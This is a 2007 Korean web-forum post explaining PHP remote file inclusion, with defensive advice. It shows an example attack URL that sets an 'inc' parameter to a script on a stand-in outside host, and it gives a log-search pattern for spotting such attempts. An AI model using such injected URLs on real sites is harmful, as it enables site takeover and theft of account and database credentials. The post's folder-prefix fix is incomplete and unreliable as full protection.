메인
기술
메인
기술
무료게임
잡담
자유
개인
일정
갤러리
회원가입
계정 찾기
로그인
HOME
기술
홈페이지 해킹을 줄여보자.
목록
작성자
공대여자
작성 : 2007-06-19 10:52
조회 : 102
지남
1일간
2007-06-19
-
2007-06-19
좌표
첨부된 파일이 없습니다.
#weblang
해킹방법
본래 URL : http://xxxx.com/index.php?inc=menu/step2.php
해킹시도 URL : http://xxxx.com/index.php?inc=
http://yyyy.com/hack.txt
설명
GET 인자로 inc가 include하는 페이지를 나타내는 경우
본래 페이지 대신에 http://yyyy.com/hack.txt 가 include되어서 동작한다.
피해
hack.txt가 악의적으로 만들어진 스크립트를 포함할 경우 그 스크립트가 웹상에서 실행되어 핵커는 홈페이지를 마음대로 제어하게 된다.
핵커는 홈페이지에 사용된 변수 속에서 계정 아이디,비밀번호 또는 DB 아이디, 비밀번호를 알아낼 수 있을 것이다.
대책
위 방법은
PHP 4.3.x 이상
으로 PHP를 업그레이드 하면 대부분 막을 수 있다.
GET 인자로
include하는 페이지의 url을 받아오지 않는다.
꼭 받아야할 경우 지정된 폴더를 뺀 url을 받고 PHP안에서 그 url을 포함시켜서 처리한다.
ex>
?inc=step2.php
PHP안에서는
$inc = 'menu2/'.$_GET['inc'];
처럼 처리
카운터에서
의심스런 접근
이 없는지 확인한다.
카운터의 DB에서 접근 페이지를 %?%http://% 처럼 검색해보기 바란다.
P.S
카운터 뒤지던 중 하도 저런 접근이 많아서(약 80 회) 한번 적어봅니다.
언제나 "공대여자는 이쁘다"는 마음가짐을 가지세요.
댓글
/
/
답변
수정
삭제
No Nickname
No Comment
새로운 댓글 작성
권한이 없습니다.
{{m_row.m_nick}}
내용이 너무 많습니다!
-
no-star
★☆☆☆☆
★★☆☆☆
★★★☆☆
★★★★☆
★★★★★
확인
게시물 : 1640 (110 page)
📅 달력형
📷 갤러리형
RSS
tag
제목
내용
제목+내용
제목+내용+코멘트
작성자
태그
검색
No
제목
작성자
날짜
조회
공지
[기본형] HTML (with 부트스트랩5.3 , jquery 3.7, vue.js)
#기본형
공대여자
24-02-06
02-06
1391
공지
유용한 리눅스(LINUX) 명령어
#linux
#command
공대여자
11-03-03
03-03
11170
공지
[공지] 기술 게시판
#etc
#공지
mins01
05-06-24
06-24
11395
395
phpexcelreader 실험 (php에서 엑셀파일 읽기)
#php
공대여자
07-07-10
07-10
116
394
PHP용 utf8 문자열 제어함수 (mb함수등이 지원 안될때)
#php
공대여자
07-07-09
07-09
112
393
JS로 만들어진 MD4,5 함수(해쉬함수)
#javascript
공대여자
07-07-04
07-04
133
392
주요 포털 메모리 사용량 체크
#weblang
공대여자
07-07-03
07-03
94
391
유니코드 차트
#weblang
공대여자
07-06-30
06-30
105
390
whois.domaintools.com 도메인에 대한 정보를 알려준다.
#weblang
공대여자
07-06-30
06-30
97
389
알고리즘의 적정성
#weblang
공대여자
07-06-28
06-28
90
388
js_string , 문자열 제어 함수, 프로토 타입 모음
#javascript
공대여자
07-06-27
06-27
100
387
IP 차단 리스트 공유합니다.
#weblang
공대여자
07-06-26
06-26
103
386
Status Code Definitions. HTTP 접속 상태 코드
#weblang
공대여자
07-06-21
06-21
131
385
[잡담]당신이 웹 언어(PHP등)를 공부할려고한다면.
#weblang
공대여자
07-06-19
06-19
97
384
홈페이지 해킹을 줄여보자.
#weblang
공대여자
07-06-19
06-19
103
383
JS의 속도를 체크해보자!
#javascript
공대여자
07-06-13
06-13
96
382
[DBMS] mysql 서버 이전시의 캐릭터셋 문제...
#charset
#database
#mysql
공대여자
07-06-13
06-13
250
381
[DBMS] mysql 백업(Backup) 및 복구(Recover)
1
#database
#mysql
공대여자
07-06-13
06-13
167